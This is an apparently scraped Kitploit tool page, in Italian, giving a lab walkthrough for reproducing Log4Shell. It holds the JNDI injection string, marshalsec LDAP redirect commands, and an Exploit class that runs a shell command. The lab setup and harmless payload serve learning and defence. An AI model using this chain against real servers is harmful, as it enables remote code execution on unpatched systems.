Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/racoon-rac/cve-2021-44228
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubracoon-rac/cve-2021-44228

CVE-2021-44228

Guida di riproduzione passo-passo per CVE-2021-44228 (Log4Shell) con JDK 8u20, Log4j 2.14.1 vulnerabile, server LDAP marshalsec e compilazione di payload personalizzati.

Vedi Repository
53 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44228

Penso che questa storia sia più pratica (pianto)christophetd/log4shell-vulnerable-app

Poiché ho indagato solo per interesse e d'impulso, ritengo che ci possano essere parti vaghe o errori.
Per favore, procedete a vostro rischio e pericolo.

Creare l'ambiente di riproduzione.

Dovrebbe funzionare in un ambiente linux.

1. Download di jdk

A partire da jdk8u191, è stata aggiunta l'opzione com.sun.jndi.rmi.object.trustURLCodebase e il valore predefinito è False. In questo stato non è possibile caricare classi preparate esternamente, quindi questa volta utilizziamo una versione precedente.
(È possibile caricare classi interne o bypassare? ?) https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

Download diretto di jdk8u20
Decomprimerlo e posizionarlo ad esempio in /opt.

2. Preparazione di log4j vulnerabile

Download di log4j
Estrarre l'archivio e prelevare log4j-api-2.14.1.jar e (questa volta li ho inseriti in una directory chiamata log4japp).

log4j-core-2.14.1.jar

3. Impostare il classpath di log4j

root@kitploit:~
export CLASSPATH=:/path/to/log4japp/log4j-api-2.14.1.jar:/path/to/log4japp/log4j-core-2.14.1.jar

4. Creare una semplice applicazione

root@kitploit:~
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {


        private static final Logger logger = LogManager.getLogger(log4j.class);

        public static void main(String[] args) {
                logger.error("${jndi:ldap://your-ip:1389/resource}");
                // /resource がないと動きませんでした。
        }
}

5. Preparazione di marshalsec

mbechler/marshalsec
Reindirizzare le richieste LDAP verso il Web.

root@kitploit:~
mvn clean package -DskipTests

Avvio dell'ascolto

root@kitploit:~
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-web-ip:8888/#Exploit"

Preparare anche la destinazione del reindirizzamento di marshalsec

root@kitploit:~
python3 -m http.server 8888

6. Preparare la classe da passare a marshalsec

root@kitploit:~
class Exploit {
    static {
        try { Runtime.getRuntime().exec("touch /tmp/evil"); } catch(Exception e) {}
    }
}

Compilare usando il jdk8u20 installato

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac Exploit.java

7. Exploit

Compilare ed eseguire usando il jdk8u20 installato.

root@kitploit:~
/opt/java/jdk1.8.0_20/bin/javac log4j.java
/opt/java/jdk1.8.0_20/bin/java log4j

screenshot

Scarica lo strumento